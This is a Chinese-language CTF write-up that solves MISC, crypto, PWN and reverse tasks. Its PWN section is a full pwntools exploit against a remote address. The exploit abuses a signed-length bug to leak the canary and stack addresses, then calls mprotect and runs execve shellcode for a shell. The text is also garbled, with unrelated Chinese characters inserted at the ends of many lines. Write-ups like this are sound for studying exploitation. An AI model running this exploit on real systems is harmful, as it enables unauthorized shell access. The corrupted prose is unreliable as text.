MISC1:
題目的下載文件是一個(gè)公眾號(hào)的二維碼株搔,關(guān)注公眾號(hào)回復(fù)之后得到圖片
圖片.png
base64加密认烁,直接丟進(jìn)去在線解密肿男,發(fā)現(xiàn)亂碼,再看一下圖片却嗡,前面是字母NOTHIS舶沛,去掉NOTHIS,在解密一次窗价,得到flag
MISC2:
kail下的strings sloth.jpg之后出現(xiàn)字符串:
圖片.png
最下面有一個(gè)ROT13的提示如庭,對(duì)那串字符串進(jìn)行解密后得到一串字符,鍵盤密碼解得flag
圖片.png
CRYPTO:
腳本加密撼港,直接腳本解密
import random
from struct import pack
from struct import unpack
from numpy import *
def Str2matrix(s):
return [map(lambda x : ord(x), list(s[i:i+4])) for i in xrange(0, len(s), 4)]
def DecStr2matrix(s):
matrix = []
row = []
rowcount = 0
for i in xrange(0, len(s), 2):
item = int(s[i:i+2].encode("hex"),16)
row.append(item)
rowcount += 1
if rowcount==4:
rowcount=0
matrix.append(row)
row=[]
return matrix
def Matrix2str(m):
return ''.join(map(lambda x : ''.join(map(lambda y : pack('!H', y), x)), m))
def DecMatrix2str(m):
return ''.join(map(lambda x : ''.join(map(lambda y : pack('!B', y), x)), m))
def Generate(password):
random.seed(password)
return [[random.randint(0,64) for i in xrange(4)] for j in xrange(4)]
def Multiply(A,B):
C = [[0 for i in xrange(4)] for j in xrange(4)]
for i in xrange(4):
for j in xrange(4):
for k in xrange(4):
C[i][j] += A[i][k] * B[k][j]
return C
def Encrypt(fname,mkey):
key = Generate(5)
data = open(fname, 'rb').read()
length = pack('!I', len(data))
while len(data) % 16 != 0:
data += '\x00'
out = open(fname + '.out', 'wb')
out.write(length)
for i in xrange(0, len(data), 16):
cipher = Multiply(Str2matrix(data[i:i+16]), key)
mclear = matrix(Str2matrix(data[i:i+16]))
mcipher = matrix(cipher)
mcipher = mclear*mkey
out.write(Matrix2str(cipher))
out.close()
return cipher
def Decrypt(fname,key):
data = open(fname, 'rb').read()
length = int(unpack('!I', data[0:4])[0])
data = data[4:]
out = open(fname + '.orig', 'wb')
for i in xrange(0, len(data), 32):
mdata = DecStr2matrix(data[i:i+32])
clear = matrix(mdata)*key.I
m = clear.round().tolist()
m = [[int(item) for item in row] for row in m]
out.write(DecMatrix2str(m))
out.close()
return clear
def ExtractKey(fname, clearstring):
data = open(fname, 'rb').read()
cipher = data[4:36]
clear = clearstring.decode("hex")
mclear = matrix(Str2matrix(clear))
mcipher = matrix(DecStr2matrix(cipher))
mkey = mclear.I*mcipher
return mkey
#Encrypt('flag.wmv')
ourkey = matrix(Generate(5))
print"[+] Extract key"
key = ExtractKey("secret.wmv.enc", "3026b2758e66cf11a6d900aa0062ce6c")
print("[+] Key:\n{0}".format(key))
print"[+] Decrypt video"
clear = Decrypt("secret.wmv.enc",key)
圖片.png
PWN:
這道是在網(wǎng)上有原題的坪它,典型的整數(shù)溢出。先運(yùn)行一下餐胀,并查看一下這個(gè)文件的具體信息
圖片.png
圖片.png
32位IDA查看之后哟楷,可以發(fā)現(xiàn)這里有2個(gè)錯(cuò)誤:第一個(gè)是長(zhǎng)度比較被簽名:
.text:080488AA 7E 07 jle short LEN_OK_80488B3
通過給出一個(gè)負(fù)長(zhǎng)度,我們可以溢出堆棧緩沖區(qū)否灾。第二個(gè)bug是getnline()卖擅。當(dāng)輸入填充緩沖區(qū)時(shí),不添加NULL字節(jié)墨技。因此惩阶,可以使用printf()獲取非NULL終止字符串和泄漏信息。我們可以通過泄露堆棧地址來繞過陰影堆棧扣汪,從而劫持地址指針断楷。因?yàn)橛衜protect(),所以我們可以重用它們來使堆棧執(zhí)行崭别。在我們這樣做之后冬筒,我們可以返回到那里的地址并執(zhí)行我們的shellcode恐锣。
腳本:
from pwn import *
from time import *
debug = True
local = False
x86 = True
script = open('./shadow.gdb','a+')
elf = ELF('shadow')
if debug:
context.log_level = 'debug'
else:
context.log_level = 'info'
if local:
if x86 == False:
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
libc = ELF('/lib32/libc.so.6')
p = process('./shadow')
else:
if x86 == False:
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
libc = ELF('/lib32/libc.so.6')
p = remote('118.190.132.201',4545)
def attack():
p.recvuntil('Input name : ')
#
p.sendline('b'*0x4)
p.recvuntil('Message length : ')
p.sendline(str(-2))
p.recvuntil('Input message : ')
p.send('a'*0x21)
p.recvuntil('a'*0x21)
canary = u32('\x00'+p.recv(3))
log.info('Canary: '+hex(canary))
p.recvuntil('Change name? (y/n) : ')
p.sendline('n')
p.recvuntil('Message length : ')
p.sendline('-2')
p.recvuntil('Input message : ')
payload = 'a'*0x2c
p.send(payload)
p.recvuntil('a'*0x2c)
saved_ebp = u32(p.recv(4))
saved_eip = u32(p.recv(4))
some_buf = u32(p.recv(4))
log.info('Saved_ebp '+hex(saved_ebp))
log.info('Saved_eip '+hex(saved_eip))
log.info('Some_buf '+hex(some_buf))
p.recvuntil('Change name? (y/n) : ')
p.sendline('n')
p.recvuntil('Message length : ')
p.sendline('-2')
p.recvuntil('Input message : ')
payload = 'a'*0x20
payload+= p32(0xdeadbeef)
payload+= p32(0x42424242)
payload+= p32(saved_ebp)
payload+= p32(0x43434343)
payload+= p32(0x44444444)
payload+= p32(saved_ebp-0x100)
payload+= p32(0x100)
payload+= p32(0x500)
p.sendline(payload)
p.recvuntil('a'*0x20)
p.recvuntil('Input name : ')
sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
payload = p32(elf.plt['mprotect'])
payload+= p32(saved_ebp-0xe8)
payload+= p32(saved_ebp&0xfffff000) #addr
payload+= p32(0x1000) #len
payload+= p32(0x7) #prot
payload+= '\x90' * 0x50
payload+= sc
p.sendline(payload)
p.interactive()
attack()
REVERSE:
indexs = [0x1a,0x2b,0x38,0x69,0x15]
vals = [-0xc,7,0x10,-0x11,-0x5]
flag = 'flag{Cra0L_Me_OkQAQ}'
print len(flag)
st = ''
for i in range(5):
st += chr(indexs[i]^0x59)
for i in range(5):
print flag[i+5]
flag += chr(ord(flag[i+5])-vals[i])
print flag
前五個(gè)字符for i in range(5):st += chr(indexs[i]^0x59)計(jì)算出來的,中間的Me看了很久舞痰,最后是爆破才弄出來土榴,而計(jì)算后面五個(gè)字符的時(shí)候,有一個(gè)小坑响牛,應(yīng)該是要去看esi的玷禽,這里通過前五個(gè)輸入字符-差值,0xfffffff4對(duì)應(yīng)的是-0xc
圖片.png
